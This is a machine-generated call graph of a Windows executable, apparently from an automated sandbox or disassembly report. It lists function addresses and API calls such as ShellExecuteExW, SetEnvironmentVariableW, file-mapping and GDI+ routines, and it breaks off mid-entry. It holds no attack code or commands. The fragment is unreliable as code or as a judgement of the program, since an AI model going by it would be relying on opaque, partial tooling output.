22981->22978 22984 1ebf0b SetFileAttributesW 22981->22984 22989 1ec2e7 GetDlgItem SetWindowTextW SendMessageW 22981->22989 22993 1ec327 SendMessageW 22981->22993 22997 1e17ac CompareStringW 22981->22997 22998 1eaa36 22981->22998 23002 1e9da4 GetCurrentDirectoryW 22981->23002 23007 1da52a 7 API calls 22981->23007 23008 1da4b3 FindClose 22981->23008 23009 1eab9a 76 API calls ___std_exception_copy 22981->23009 23010 1f35de 22981->23010 22985 1ebfc5 GetFileAttributesW 22984->22985 22996 1ebf25 ___scrt_get_show_window_mode 22984->22996 22985->22981 22988 1ebfd7 DeleteFileW 22985->22988 22988->22981 22990 1ebfe8 22988->22990 22989->22981 23004 1d400a 22990->23004 22993->22981 22994 1ec01d MoveFileW 22994->22981 22995 1ec035 MoveFileExW 22994->22995 22995->22981 22996->22981 22996->22985 23003 1db4f7 52 API calls 2 library calls 22996->23003 22997->22981 22999 1eaa40 22998->22999 23000 1eaaf3 ExpandEnvironmentStringsW 22999->23000 23001 1eab16 22999->23001 23000->23001 23001->22981 23002->22981 23003->22996 23046 1d3fdd 23004->23046 23007->22981 23008->22981 23009->22981 23011 1f8606 23010->23011 23012 1f861e 23011->23012 23013 1f8613 23011->23013 23015 1f8626 23012->23015 23021 1f862f _abort 23012->23021 23125 1f8518 23013->23125 23019 1f84de _free 20 API calls 23015->23019 23016 1f8659 HeapReAlloc 23018 1f861b 23016->23018 23016->23021 23017 1f8634 23132 1f895a 20 API calls _abort 23017->23132 23018->22981 23019->23018 23021->23016 23021->23017 23133 1f71ad 7 API calls 2 library calls 23021->23133 23025 1ece2c ___scrt_get_show_window_mode 23023->23025 23024 1ed08a 23024->22970 23025->23024 23026 1ecf1b 23025->23026 23139 1e17ac CompareStringW 23025->23139 23136 1da180 23026->23136 23030 1ecf4f ShellExecuteExW 23030->23024 23036 1ecf62 23030->23036 23032 1ecf47 23032->23030 23033 1ecf9b 23141 1ed2e6 6 API calls 23033->23141 23034 1ecff1 CloseHandle 23035 1ecfff 23034->23035 23040 1ed00a 23034->23040 23142 1e17ac CompareStringW 23035->23142 23036->23033 23036->23034 23038 1ecf91 ShowWindow 23036->23038 23038->23033 23040->23024 23041 1ed081 ShowWindow 23040->23041 23041->23024 23042 1ecfb3 23042->23034 23043 1ecfc6 GetExitCodeProcess 23042->23043 23043->23034 23044 1ecfd9 23043->23044 23044->23034 23047 1d3ff4 __vsnwprintf_l 23046->23047 23050 1f5759 23047->23050 23053 1f3837 23050->23053 23054 1f385f 23053->23054 23055 1f3877 23053->23055 23070 1f895a 20 API calls _abort 23054->23070 23055->23054 23057 1f387f 23055->23057 23072 1f3dd6 23057->23072 23059 1f3864 23071 1f8839 26 API calls ___std_exception_copy 23059->23071 23062 1f386f 23064 1eec4a ___delayLoadHelper2@8 5 API calls 23062->23064 23066 1d3ffe GetFileAttributesW 23064->23066 23065 1f3907 23081 1f4186 51 API calls 4 library calls 23065->23081 23066->22990 23066->22994 23069 1f3912 23082 1f3e59 20 API calls _free 23069->23082 23070->23059 23071->23062 23073 1f388f 23072->23073 23074 1f3df3 23072->23074 23080 1f3da1 20 API calls 2 library calls 23073->23080 23074->23073 23083 1f8fa5 GetLastError 23074->23083 23076 1f3e14 23103 1f90fa 38 API calls __cftof 23076->23103 23078 1f3e2d 23104 1f9127 38 API calls __cftof 23078->23104 23080->23065 23081->23069 23082->23062 23084 1f8fbb 23083->23084 23085 1f8fc1 23083->23085 23105 1fa61b 11 API calls 2 library calls 23084->23105 23089 1f9010 SetLastError 23085->23089 23106 1f85a9 23085->23106 23089->23076 23092 1f8ff0 23094 1f8ff7 23092->23094 23095 1f8fdb 23092->23095 23093 1f8fe1 23097 1f901c SetLastError 23093->23097 23120 1f8e16 20 API calls _abort 23094->23120 23113 1f84de 23095->23113 23121 1f8566 38 API calls _abort 23097->23121 23098 1f9002 23100 1f84de _free 20 API calls 23098->23100 23102 1f9009 23100->23102 23102->23089 23102->23097 23103->23078 23104->23073 23105->23085 23112 1f85b6 _abort 23106->23112 23107 1f85f6 23123 1f895a 20 API calls _abort 23107->23123 23108 1f85e1 RtlAllocateHeap 23110 1f85f4 23108->23110 23108->23112 23110->23095 23119 1fa671 11 API calls 2 library calls 23110->23119 23112->23107 23112->23108 23122 1f71ad 7 API calls 2 library calls 23112->23122 23114 1f84e9 RtlFreeHeap 23113->23114 23115 1f8512 __dosmaperr 23113->23115 23114->23115 23116 1f84fe 23114->23116 23115->23093 23124 1f895a 20 API calls _abort 23116->23124 23118 1f8504 GetLastError 23118->23115 23119->23092 23120->23098 23122->23112 23123->23110 23124->23118 23126 1f8556 23125->23126 23130 1f8526 _abort 23125->23130 23135 1f895a 20 API calls _abort 23126->23135 23127 1f8541 RtlAllocateHeap 23129 1f8554 23127->23129 23127->23130 23129->23018 23130->23126 23130->23127 23134 1f71ad 7 API calls 2 library calls 23130->23134 23132->23018 23133->23021 23134->23130 23135->23129 23143 1da194 23136->23143 23139->23026 23140 1db239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23140->23032 23141->23042 23142->23040 23151 1ee360 23143->23151 23146 1da189 23146->23030 23146->23140 23147 1da1b2 23153 1db66c 23147->23153 23149 1da1c6 23149->23146 23150 1da1ca GetFileAttributesW 23149->23150 23150->23146 23152 1da1a1 GetFileAttributesW 23151->23152 23152->23146 23152->23147 23154 1db679 23153->23154 23162 1db683 23154->23162 23163 1db806 CharUpperW 23154->23163 23156 1db692 23164 1db832 CharUpperW 23156->23164 23158 1db6a1 23159 1db71c GetCurrentDirectoryW 23158->23159 23160 1db6a5 23158->23160 23159->23162 23165 1db806 CharUpperW 23160->23165 23162->23149 23163->23156 23164->23158 23165->23162 24809 1eec0b 28 API calls 2 library calls 24867 1edb0b 19 API calls ___delayLoadHelper2@8 24868 1d1f05 126 API calls __EH_prolog 24810 1eea00 46 API calls 6 library calls 24870 1ebe49 103 API calls 4 library calls 23176 1fb731 31 API calls ___delayLoadHelper2@8 24811 1ea430 73 API calls 23224 1d9f2f 23225 1d9f3d 23224->23225 23226 1d9f44 23224->23226 23227 1d9f4a GetStdHandle 23226->23227 23231 1d9f55 23226->23231 23227->23231 23228 1d9fa9 WriteFile 23228->23231 23229 1d9f7c WriteFile 23230 1d9f7a 23229->23230 23229->23231 23230->23229 23230->23231 23231->23225 23231->23228 23231->23229 23231->23230 23233 1da031 23231->23233 23235 1d6e18 60 API calls 23231->23235 23236 1d7061 75 API calls 23233->23236 23235->23231 23236->23225 24812 1d1025 29 API calls pre_c_initialization 23245 1d9b59 23246 1d9b63 23245->23246 23249 1d9bd7 23245->23249 23247 1d9bad SetFilePointer 23246->23247 23248 1d9bcd GetLastError 23247->23248 23247->23249 23248->23249 24875 1e9b50 GdipDisposeImage GdipFree __except_handler4 24814 1f8050 8 API calls ___vcrt_uninitialize 24877 1ed34e DialogBoxParamW 24817 1e8c40 GetClientRect 24818 1eec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24819 1f3040 5 API calls 2 library calls 24878 1ebe49 98 API calls 3 library calls 24820 200040 IsProcessorFeaturePresent 24821 1d1075 82 API calls pre_c_initialization 24822 1e5c77 121 API calls __vswprintf_c_l 24001 1ed573 24002 1ed580 24001->24002 24003 1dddd1 53 API calls 24002->24003 24004 1ed594 24003->24004 24005 1d400a _swprintf 51 API calls 24004->24005 24006 1ed5a6 SetDlgItemTextW 24005->24006 24009 1eac74 PeekMessageW 24006->24009 24010 1eac8f GetMessageW 24009->24010 24011 1eacc8 24009->24011 24012 1eacb4 TranslateMessage DispatchMessageW 24010->24012 24013 1eaca5 IsDialogMessageW 24010->24013 24012->24011 24013->24011 24013->24012 24827 1efc60 51 API calls 2 library calls 24829 1f3460 RtlUnwind 24830 1f9c60 71 API calls _free 24831 1ea89d 78 API calls 24832 1dea98 FreeLibrary 24880 1f2397 48 API calls 22962 1ed997 22964 1ed89b 22962->22964 22963 1edf59 ___delayLoadHelper2@8 19 API calls 22963->22964 22964->22963 24834 1e7090 114 API calls 24835 1ecc90 70 API calls 24881 1ea990 97 API calls 24882 1e9b90 GdipCloneImage GdipAlloc 22967 1ed891 19 API calls ___delayLoadHelper2@8 24883 1f9b90 21 API calls 2 library calls 24837 1fac0e 27 API calls ___delayLoadHelper2@8 23169 1d1385 82 API calls 3 library calls 24887 1f5780 QueryPerformanceFrequency QueryPerformanceCounter 24839 1f76bd 52 API calls 3 library calls 24889 1f79b7 55 API calls _free 24841 1d16b0 84 API calls 23177 1f90b0 23185 1fa56f 23177->23185 23180 1f90c4 23182 1f90cc 23183 1f90d9 23182->23183 23193 1f90e0 11 API calls 23182->23193 23194 1fa458 23185->23194 23188 1fa5ae TlsAlloc 23189 1fa59f 23188->23189 23190 1eec4a ___delayLoadHelper2@8 5 API calls 23189->23190 23191 1f90ba 23190->23191 23191->23180 23192 1f9029 20 API calls 2 library calls 23191->23192 23192->23182 23193->23180 23195 1fa488 23194->23195 23198 1fa484 23194->23198 23195->23188 23195->23189 23196 1fa4a8 23196->23195 23199 1fa4b4 GetProcAddress 23196->23199 23198->23195 23198->23196 23201 1fa4f4 23198->23201 23200 1fa4c4 __crt_fast_encode_pointer 23199->23200 23200->23195 23202 1fa515 LoadLibraryExW 23201->23202 23203 1fa50a 23201->23203 23204 1fa54a 23202->23204 23205 1fa532 GetLastError 23202->23205 23203->23198 23204->23203 23206 1fa561 FreeLibrary 23204->23206 23205->23204 23207 1fa53d LoadLibraryExW 23205->23207 23206->23203 23207->23204 23208 1fa3b0 23209 1fa3bb 23208->23209 23211 1fa3e4 23209->23211 23213 1fa3e0 23209->23213 23214 1fa6ca 23209->23214 23221 1fa410 DeleteCriticalSection 23211->23221 23215 1fa458 _abort 5 API calls 23214->23215 23216 1fa6f1 23215->23216 23217 1fa70f InitializeCriticalSectionAndSpinCount 23216->23217 23218 1fa6fa 23216->23218 23217->23218 23219 1eec4a ___delayLoadHelper2@8 5 API calls 23218->23219 23220 1fa726 23219->23220 23220->23209 23221->23213 24842 1f1eb0 6 API calls 3 library calls 24843 1ee4a2 38 API calls 2 library calls 24845 1d96a0 79 API calls 24891 1fe9a0 51 API calls 24848 2016e0 CloseHandle 23253 1d10d5 23258 1d5bd7 23253->23258 23259 1d5be1 __EH_prolog 23258->23259 23265 1db07d 23259->23265 23261 1d5bed 23271 1d5dcc GetCurrentProcess GetProcessAffinityMask 23261->23271 23266 1db087 __EH_prolog 23265->23266 23272 1dea80 80 API calls 23266->23272 23268 1db099 23273 1db195 23268->23273 23272->23268 23274 1db1a7 ___scrt_get_show_window_mode 23273->23274 23277 1e0948 23274->23277 23280 1e0908 GetCurrentProcess GetProcessAffinityMask 23277->23280 23281 1db10f 23280->23281 23281->23261 23282 1eead2 23283 1eeade ___FrameUnwindToState 23282->23283 23308 1ee5c7 23283->23308 23285 1eeae5 23287 1eeb0e 23285->23287 23388 1eef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 23285->23388 23288 1eeb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23287->23288 23319 1f824d 23287->23319 23292 1eebad 23288->23292 23389 1f7243 38 API calls 2 library calls 23288->23389 23327 1ef020 23292->23327 23302 1eebd9 23304 1eebe2 23302->23304 23390 1f764a 28 API calls _abort 23302->23390 23391 1ee73e 13 API calls 2 library calls 23304->23391 23307 1eeb2d ___FrameUnwindToState 23309 1ee5d0 23308->23309 23392 1eed5b IsProcessorFeaturePresent 23309->23392 23311 1ee5dc 23393 1f2016 23311->23393 23313 1ee5e1 23314 1ee5e5 23313->23314 23402 1f80d7 23313->23402 23314->23285 23317 1ee5fc 23317->23285 23321 1f8264 23319->23321 23320 1eec4a ___delayLoadHelper2@8 5 API calls 23322 1eeb27 23320->23322 23321->23320 23322->23307 23323 1f81f1 23322->23323 23325 1f8220 23323->23325 23324 1eec4a ___delayLoadHelper2@8 5 API calls 23326 1f8249 23324->23326 23325->23324 23326->23288 23494 1ef350 23327->23494 23330 1eebb3 23331 1f819e 23330->23331 23496 1fb290 23331->23496 23333 1f81a7 23334 1eebbc 23333->23334 23500 1fb59a 38 API calls 23333->23500 23336 1ed5d4 23334->23336 23621 1e00cf 23336->23621 23340 1ed5f3 23670 1ea335 23340->23670 23342 1ed5fc 23674 1e13b3 GetCPInfo 23342->23674 23344 1ed606 ___scrt_get_show_window_mode 23345 1ed619 GetCommandLineW 23344->23345 23346 1ed628 23345->23346 23347 1ed6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23345->23347 23677 1ebc84 23346->23677 23348 1d400a _swprintf 51 API calls 23347->23348 23350 1ed70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 23348->23350 23688 1eaded LoadBitmapW 23350->23688 23353 1ed636 OpenFileMappingW 23356 1ed64f MapViewOfFile 23353->23356 23357 1ed696 CloseHandle 23353->23357 23354 1ed6a0 23682 1ed287 23354->23682 23360 1ed68d UnmapViewOfFile 23356->23360 23361 1ed660 __vswprintf_c_l 23356->23361 23357->23347 23360->23357 23365 1ed287 2 API calls 23361->23365 23367 1ed67c 23365->23367 23366 1e8835 8 API calls 23368 1ed76a DialogBoxParamW 23366->23368 23367->23360 23369 1ed7a4 23368->23369 23370 1ed7bd 23369->23370 23371 1ed7b6 Sleep 23369->23371 23372 1ed7cb 23370->23372 23718 1ea544 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 23370->23718 23371->23370 23374 1ed7ea DeleteObject 23372->23374 23375 1ed7ff DeleteObject 23374->23375 23376 1ed806 23374->23376 23375->23376 23377 1ed849 23376->23377 23378 1ed837 23376->23378 23715 1ea39d 23377->23715 23719 1ed2e6 6 API calls 23378->23719 23380 1ed83d CloseHandle 23380->23377 23382 1ed883 23383 1f757e GetModuleHandleW 23382->23383 23384 1eebcf 23383->23384 23384->23302 23385 1f76a7 23384->23385 23928 1f7424 23385->23928 23388->23285 23389->23292 23390->23304 23391->23307 23392->23311 23394 1f201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23393->23394 23406 1f310e 23394->23406 23398 1f2031 23399 1f203c 23398->23399 23420 1f314a DeleteCriticalSection 23398->23420 23399->23313 23401 1f2029 23401->23313 23448 1fb73a 23402->23448 23405 1f203f 8 API calls 3 library calls 23405->23314 23407 1f3117 23406->23407 23409 1f3140 23407->23409 23410 1f2025 23407->23410 23421 1f3385 23407->23421 23426 1f314a DeleteCriticalSection 23409->23426 23410->23401 23412 1f215c 23410->23412 23441 1f329a 23412->23441 23414 1f2166 23415 1f2171 23414->23415 23446 1f3348 6 API calls try_get_function 23414->23446 23415->23398 23417 1f217f 23418 1f218c 23417->23418 23447 1f218f 6 API calls ___vcrt_FlsFree 23417->23447 23418->23398 23420->23401 23427 1f3179 23421->23427 23424 1f33bc InitializeCriticalSectionAndSpinCount 23425 1f33a8 23424->23425 23425->23407 23426->23410 23428 1f31ad 23427->23428 23431 1f31a9 23427->23431 23428->23424 23428->23425 23429 1f31cd 23429->23428 23432 1f31d9 GetProcAddress 23429->23432 23431->23428 23431->23429 23434 1f3219 23431->23434 23433 1f31e9 __crt_fast_encode_pointer 23432->23433 23433->23428 23435 1f3241 LoadLibraryExW 23434->23435 23440 1f3236 23434->23440 23436 1f325d GetLastError 23435->23436 23439 1f3275 23435->23439 23437 1f3268 LoadLibraryExW 23436->23437 23436->23439 23437->23439 23438 1f328c FreeLibrary 23438->23440 23439->23438 23439->23440 23440->23431 23442 1f3179 try_get_function 5 API calls 23441->23442 23443 1f32b4 23442->23443 23444 1f32cc TlsAlloc 23443->23444 23445 1f32bd 23443->23445 23445->23414 23446->23417 23447->23415 23449 1fb757 23448->23449 23452 1fb753 23448->23452 23449->23452 23454 1f9e60 23449->23454 23450 1eec4a ___delayLoadHelper2@8 5 API calls 23451 1ee5ee 23450->23451 23451->23317 23451->23405 23452->23450 23455 1f9e6c ___FrameUnwindToState 23454->23455 23466 1fa3f1 EnterCriticalSection 23455->23466 23457 1f9e73 23467 1fbc39 23457->23467 23459 1f9e82 23460 1f9e91 23459->23460 23480 1f9ce9 29 API calls 23459->23480 23482 1f9ead LeaveCriticalSection _abort 23460->23482 23463 1f9e8c 23481 1f9d9f GetStdHandle GetFileType 23463->23481 23464 1f9ea2 ___FrameUnwindToState 23464->23449 23466->23457 23468 1fbc45 ___FrameUnwindToState 23467->23468 23469 1fbc69 23468->23469 23470 1fbc52 23468->23470 23483 1fa3f1 EnterCriticalSection 23469->23483 23491 1f895a 20 API calls _abort 23470->23491 23473 1fbc75 23479 1fbca1 23473->23479 23484 1fbb8a 23473->23484 23474 1fbc57 23492 1f8839 26 API calls ___std_exception_copy 23474->23492 23478 1fbc61 ___FrameUnwindToState 23478->23459 23493 1fbcc8 LeaveCriticalSection _abort 23479->23493 23480->23463 23481->23460 23482->23464 23483->23473 23485 1f85a9 _abort 20 API calls 23484->23485 23487 1fbb9c 23485->23487 23486 1fbba9 23488 1f84de _free 20 API calls 23486->23488 23487->23486 23489 1fa6ca 11 API calls 23487->23489 23490 1fbbfb 23488->23490 23489->23487 23490->23473 23491->23474 23492->23478 23493->23478 23495 1ef033 GetStartupInfoW 23494->23495 23495->23330 23497 1fb2a2 23496->23497 23498 1fb299 23496->23498 23497->23333 23501 1fb188 23498->23501 23500->23333 23502 1f8fa5 _abort 38 API calls 23501->23502 23503 1fb195 23502->23503 23521 1fb2ae 23503->23521 23505 1fb19d 23530 1faf1b 23505->23530 23508 1fb1b4 23508->23497 23509 1f8518 __vswprintf_c_l 21 API calls 23510 1fb1c5 23509->23510 23520 1fb1f7 23510->23520 23537 1fb350 23510->23537 23512 1f84de _free 20 API calls 23512->23508 23514 1fb20f 23517 1fb23b 23514->23517 23518 1f84de _free 20 API calls 23514->23518 23515 1fb1f2 23547 1f895a 20 API calls _abort 23515->23547 23517->23520 23548 1fadf1 26 API calls 23517->23548 23518->23517 23520->23512 23522 1fb2ba ___FrameUnwindToState 23521->23522 23523 1f8fa5 _abort 38 API calls 23522->23523 23524 1fb2c4 23523->23524 23527 1fb348 ___FrameUnwindToState 23524->23527 23529 1f84de _free 20 API calls 23524->23529 23549 1f8566 38 API calls _abort 23524->23549 23550 1fa3f1 EnterCriticalSection 23524->23550 23551 1fb33f LeaveCriticalSection _abort 23524->23551 23527->23505 23529->23524 23531 1f3dd6 __cftof 38 API calls 23530->23531 23532 1faf2d 23531->23532 23533 1faf4e 23532->23533 23534 1faf3c GetOEMCP 23532->23534 23535 1faf53 GetACP 23533->23535 23536 1faf65 23533->23536 23534->23536 23535->23536 23536->23508 23536->23509 23538 1faf1b 40 API calls 23537->23538 23540 1fb36f 23538->23540 23539 1fb376 23541 1eec4a ___delayLoadHelper2@8 5 API calls 23539->23541 23540->23539 23543 1fb3c0 IsValidCodePage 23540->23543 23545 1fb3e5 ___scrt_get_show_window_mode 23540->23545 23542 1fb1ea 23541->23542 23542->23514 23542->23515 23543->23539 23544 1fb3d2 GetCPInfo 23543->23544 23544->23539 23544->23545 23552 1faff4 GetCPInfo 23545->23552 23547->23520 23548->23520 23550->23524 23551->23524 23553 1fb0d8 23552->23553 23554 1fb02e 23552->23554 23556 1eec4a ___delayLoadHelper2@8 5 API calls 23553->23556 23562 1fc099 23554->23562 23558 1fb184 23556->23558 23558->23539 23561 1fa275 __vswprintf_c_l 43 API calls 23561->23553 23563 1f3dd6 __cftof 38 API calls 23562->23563 23564 1fc0b9 MultiByteToWideChar 23563->23564 23566 1fc0f7 23564->23566 23567 1fc18f 23564->23567 23570 1f8518 __vswprintf_c_l 21 API calls 23566->23570 23573 1fc118 __vsnwprintf_l ___scrt_get_show_window_mode 23566->23573 23568 1eec4a ___delayLoadHelper2@8 5 API calls 23567->23568 23571 1fb08f 23568->23571 23569 1fc189 23581 1fa2c0 20 API calls _free 23569->23581 23570->23573 23576 1fa275 23571->23576 23573->23569 23574 1fc15d MultiByteToWideChar 23573->23574 23574->23569 23575 1fc179 GetStringTypeW 23574->23575 23575->23569 23577 1f3dd6 __cftof 38 API calls 23576->23577 23578 1fa288 23577->23578 23582 1fa058 23578->23582 23581->23567 23583 1fa073 __vswprintf_c_l 23582->23583 23584 1fa099 MultiByteToWideChar 23583->23584 23585 1fa0c3 23584->23585 23586 1fa24d 23584->23586 23589 1f8518 __vswprintf_c_l 21 API calls 23585->23589 23592 1fa0e4 __vsnwprintf_l 23585->23592 23587 1eec4a ___delayLoadHelper2@8 5 API calls 23586->23587 23588 1fa260 23587->23588 23588->23561 23589->23592 23590 1fa12d MultiByteToWideChar 23591 1fa199 23590->23591 23593 1fa146 23590->23593 23618 1fa2c0 20 API calls _free 23591->23618 23592->23590 23592->23591 23609 1fa72c 23593->23609 23597 1fa1a8 23601 1f8518 __vswprintf_c_l 21 API calls 23597->23601 23604 1fa1c9 __vsnwprintf_l 23597->23604 23598 1fa170 23598->23591 23599 1fa72c __vswprintf_c_l 11 API calls 23598->23599 23599->23591 23600 1fa23e 23617 1fa2c0 20 API calls _free 23600->23617 23601->23604 23602 1fa72c __vswprintf_c_l 11 API calls 23605 1fa21d 23602->23605 23604->23600 23604->23602 23605->23600 23606 1fa22c WideCharToMultiByte 23605->23606 23606->23600 23607 1fa26c 23606->23607 23619 1fa2c0 20 API calls _free 23607->23619 23610 1fa458 _abort 5 API calls 23609->23610 23611 1fa753 23610->23611 23612 1fa75c 23611->23612 23620 1fa7b4 10 API calls 3 library calls 23611->23620 23615 1eec4a ___delayLoadHelper2@8 5 API calls 23612->23615 23614 1fa79c LCMapStringW 23614->23612 23616 1fa15d 23615->23616 23616->23591 23616->23597 23616->23598 23617->23591 23618->23586 23619->23591 23620->23614 23622 1ee360 23621->23622 23623 1e00d9 GetModuleHandleW 23622->23623 23624 1e0154 23623->23624 23625 1e00f0 GetProcAddress 23623->23625 23626 1e0484 GetModuleFileNameW 23624->23626 23729 1f70dd 42 API calls __vsnwprintf_l 23624->23729 23627 1e0109 23625->23627 23628 1e0121 GetProcAddress 23625->23628 23631 1e04a3 23626->23631 23627->23628 23628->23624 23630 1e0133 23628->23630 23630->23624 23640 1e04d2 CompareStringW 23631->23640 23642 1e0520 23631->23642 23643 1e0508 GetFileAttributesW 23631->23643 23720 1dacf5 23631->23720 23723 1e0085 23631->23723 23632 1e03be 23632->23626 23633 1e03c9 GetModuleFileNameW CreateFileW 23632->23633 23634 1e03fc SetFilePointer 23633->23634 23635 1e0478 CloseHandle 23633->23635 23634->23635 23636 1e040c ReadFile 23634->23636 23635->23626 23636->23635 23639 1e042b 23636->23639 23639->23635 23641 1e0085 2 API calls 23639->23641 23640->23631 23641->23639 23644 1e052a 23642->23644 23647 1e0560 23642->23647 23643->23631 23643->23642 23646 1e0542 GetFileAttributesW 23644->23646 23648 1e055a 23644->23648 23645 1e066f 23669 1e9da4 GetCurrentDirectoryW 23645->23669 23646->23644 23646->23648 23647->23645 23649 1dacf5 GetVersionExW 23647->23649 23648->23647 23650 1e057a 23649->23650 23651 1e05e7 23650->23651 23652 1e0581 23650->23652 23654 1d400a _swprintf 51 API calls 23651->23654 23653 1e0085 2 API calls 23652->23653 23655 1e058b 23653->23655 23656 1e060f AllocConsole 23654->23656 23659 1e0085 2 API calls 23655->23659 23657 1e061c GetCurrentProcessId AttachConsole 23656->23657 23658 1e0667 ExitProcess 23656->23658 23733 1f35b3 23657->23733 23661 1e0595 23659->23661 23730 1dddd1 23661->23730 23665 1d400a _swprintf 51 API calls 23666 1e05c3 23665->23666 23667 1dddd1 53 API calls 23666->23667 23668 1e05d2 23667->23668 23668->23658 23669->23340 23671 1e0085 2 API calls 23670->23671 23672 1ea349 OleInitialize 23671->23672 23673 1ea36c GdiplusStartup SHGetMalloc 23672->23673 23673->23342 23675 1e13d7 IsDBCSLeadByte 23674->23675 23675->23675 23676 1e13ef 23675->23676 23676->23344 23680 1ebc8e 23677->23680 23678 1ebda4 23678->23353 23678->23354 23679 1e179d CharUpperW 23679->23680 23680->23678 23680->23679 23758 1decad 80 API calls ___scrt_get_show_window_mode 23680->23758 23683 1ee360 23682->23683 23684 1ed294 SetEnvironmentVariableW 23683->23684 23685 1ed2b7 23684->23685 23686 1ed2df 23685->23686 23687 1ed2d3 SetEnvironmentVariableW 23685->23687 23686->23347 23687->23686 23689 1eae0e 23688->23689 23693 1eae15 23688->23693 23764 1e9e1c FindResourceW 23689->23764 23691 1eae2a 23759 1e9d1a 23691->23759 23692 1eae1b GetObjectW 23692->23691 23693->23691 23693->23692 23696 1eae80 23707 1dd31c 23696->23707 23697 1eae5c 23780 1e9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23697->23780 23698 1e9e1c 13 API calls 23700 1eae4d 23698->23700 23700->23697 23702 1eae53 DeleteObject 23700->23702 23701 1eae64 23781 1e9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23701->23781 23702->23697 23704 1eae6d 23782 1e9f5d 8 API calls ___scrt_get_show_window_mode 23704->23782 23706 1eae74 DeleteObject 23706->23696 23793 1dd341 23707->23793 23709 1dd328 23833 1dda4e GetModuleHandleW FindResourceW 23709->23833 23712 1e8835 23919 1ee24a 23712->23919 23716 1ea3cc GdiplusShutdown CoUninitialize 23715->23716 23716->23382 23718->23372 23719->23380 23721 1dad09 GetVersionExW 23720->23721 23722 1dad45 23720->23722 23721->23722 23722->23631 23724 1ee360 23723->23724 23725 1e0092 GetSystemDirectoryW 23724->23725 23726 1e00c8 23725->23726 23727 1e00aa 23725->23727 23726->23631 23728 1e00bb LoadLibraryW 23727->23728 23728->23726 23729->23632 23735 1dddff 23730->23735 23734 1e063d GetStdHandle WriteConsoleW Sleep FreeConsole 23733->23734 23734->23658 23741 1dd28a 23735->23741 23738 1dddfc 23738->23665 23739 1dde22 LoadStringW 23739->23738 23740 1dde39 LoadStringW 23739->23740 23740->23738 23746 1dd1c3 23741->23746 23743 1dd2a7 23744 1dd2bc 23743->23744 23754 1dd2c8 26 API calls 23743->23754 23744->23738 23744->23739 23747 1dd1de 23746->23747 23748 1dd1d7 _strncpy 23746->23748 23750 1dd202 23747->23750 23755 1e1596 WideCharToMultiByte 23747->23755 23748->23743 23753 1dd233 23750->23753 23756 1ddd6b 50 API calls __vsnprintf 23750->23756 23757 1f58d9 26 API calls 3 library calls 23753->23757 23754->23744 23755->23750 23756->23753 23757->23748 23758->23680 23783 1e9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23759->23783 23761 1e9d21 23762 1e9d2d 23761->23762 23784 1e9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23761->23784 23762->23696 23762->23697 23762->23698 23765 1e9e3e SizeofResource 23764->23765 23766 1e9e70 23764->23766 23765->23766 23767 1e9e52 LoadResource 23765->23767 23766->23693 23767->23766 23768 1e9e63 LockResource 23767->23768 23768->23766 23769 1e9e77 GlobalAlloc 23768->23769 23769->23766 23770 1e9e92 GlobalLock 23769->23770 23771 1e9f21 GlobalFree 23770->23771 23772 1e9ea1 __vswprintf_c_l 23770->23772 23771->23766 23773 1e9ea9 CreateStreamOnHGlobal 23772->23773 23774 1e9f1a GlobalUnlock 23773->23774 23775 1e9ec1 23773->23775 23774->23771 23785 1e9d7b GdipAlloc 23775->23785 23778 1e9eef GdipCreateHBITMAPFromBitmap 23779 1e9f05 23778->23779 23779->23774 23780->23701 23781->23704 23782->23706 23783->23761 23784->23762 23786 1e9d9a 23785->23786 23787 1e9d8d 23785->23787 23786->23774 23786->23778 23786->23779 23789 1e9b0f 23787->23789 23790 1e9b37 GdipCreateBitmapFromStream 23789->23790 23791 1e9b30 GdipCreateBitmapFromStreamICM 23789->23791 23792 1e9b3c 23790->23792 23791->23792 23792->23786 23794 1dd34b _wcschr __EH_prolog 23793->23794 23795 1dd37a GetModuleFileNameW 23794->23795 23796 1dd3ab 23794->23796 23797 1dd394 23795->23797 23835 1d99b0 23796->23835 23797->23796 23800 1dd407 23846 1f5a90 26 API calls 3 library calls 23800->23846 23802 1e3781 76 API calls 23804 1dd3db 23802->23804 23804->23800 23804->23802 23828 1dd627 23804->23828 23805 1dd41a 23847 1f5a90 26 API calls 3 library calls 23805->23847 23809 1dd57d ___std_exception_copy 23811 1d9bf0 80 API calls 23809->23811 23809->23828 23815 1dd5a6 ___std_exception_copy 23811->23815 23813 1dd42c 23814 1dd563 23813->23814 23813->23828 23848 1d9e40 23813->23848 23863 1d9bf0 23813->23863 23871 1d9d30 77 API calls 23813->23871 23814->23828 23872 1d9d30 77 API calls 23814->23872 23815->23828 23830 1dd5b2 ___std_exception_copy 23815->23830 23873 1e137a MultiByteToWideChar 23815->23873 23817 1dd72b 23874 1dce72 76 API calls 23817->23874 23819 1dda0a 23879 1dce72 76 API calls 23819->23879 23821 1dd9fa 23821->23709 23822 1dd771 23875 1f5a90 26 API calls 3 library calls 23822->23875 23823 1e3781 76 API calls 23825 1dd742 23823->23825 23825->23822 23825->23823 23826 1dd78b 23876 1f5a90 26 API calls 3 library calls 23826->23876 23856 1d9653 23828->23856 23829 1e1596 WideCharToMultiByte 23829->23830 23830->23817 23830->23819 23830->23821 23830->23828 23830->23829 23877 1ddd6b 50 API calls __vsnprintf 23830->23877 23878 1f58d9 26 API calls 3 library calls 23830->23878 23834 1dd32f 23833->23834 23834->23712 23836 1d99ba 23835->23836 23837 1d9a39 CreateFileW 23836->23837 23838 1d9a59 GetLastError 23837->23838 23844 1d9aaa 23837->23844 23839 1db66c 2 API calls 23838->23839 23841 1d9a79 23839->23841 23840 1d9ae1 23840->23804 23843 1d9a7d CreateFileW GetLastError 23841->23843 23841->23844 23842 1d9ac7 SetFileTime 23842->23840 23845 1d9aa1 